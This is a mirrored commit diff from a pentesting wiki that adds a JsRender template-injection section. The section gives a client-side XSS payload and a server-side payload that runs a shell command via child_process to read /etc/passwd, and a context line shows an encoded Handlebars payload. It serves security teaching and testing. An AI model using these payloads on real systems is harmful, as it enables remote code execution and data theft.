mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
af1cb68098
commit
77cd9471fb
1 changed files with 27 additions and 0 deletions
|
@ -220,6 +220,33 @@ wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%
|
||||||
|
|
||||||
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
|
||||||
|
|
||||||
|
### JsRender \(NodeJS\)
|
||||||
|
|
||||||
|
| **Template** | **Description** |
|
||||||
|
| :--- | :--- |
|
||||||
|
| {{: …}} | Evaluate and render output |
|
||||||
|
| {{> …}} | Evaluate and render HTML encoded output |
|
||||||
|
| {{!– … –}} | Comment |
|
||||||
|
| {{\* …}} and {{\*: …}} | Allow code \(disabled by default\) |
|
||||||
|
|
||||||
|
* {{:7\*7}} = 49
|
||||||
|
|
||||||
|
#### Client Side
|
||||||
|
|
||||||
|
```text
|
||||||
|
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Server Side
|
||||||
|
|
||||||
|
```bash
|
||||||
|
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
|
||||||
|
```
|
||||||
|
|
||||||
|
#### More information
|
||||||
|
|
||||||
|
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)
|
||||||
|
|
||||||
### ERB \(Ruby\)
|
### ERB \(Ruby\)
|
||||||
|
|
||||||
* `{{7*7}} = {{7*7}}`
|
* `{{7*7}} = {{7*7}}`
|
||||||
|
|
Loading…
Reference in a new issue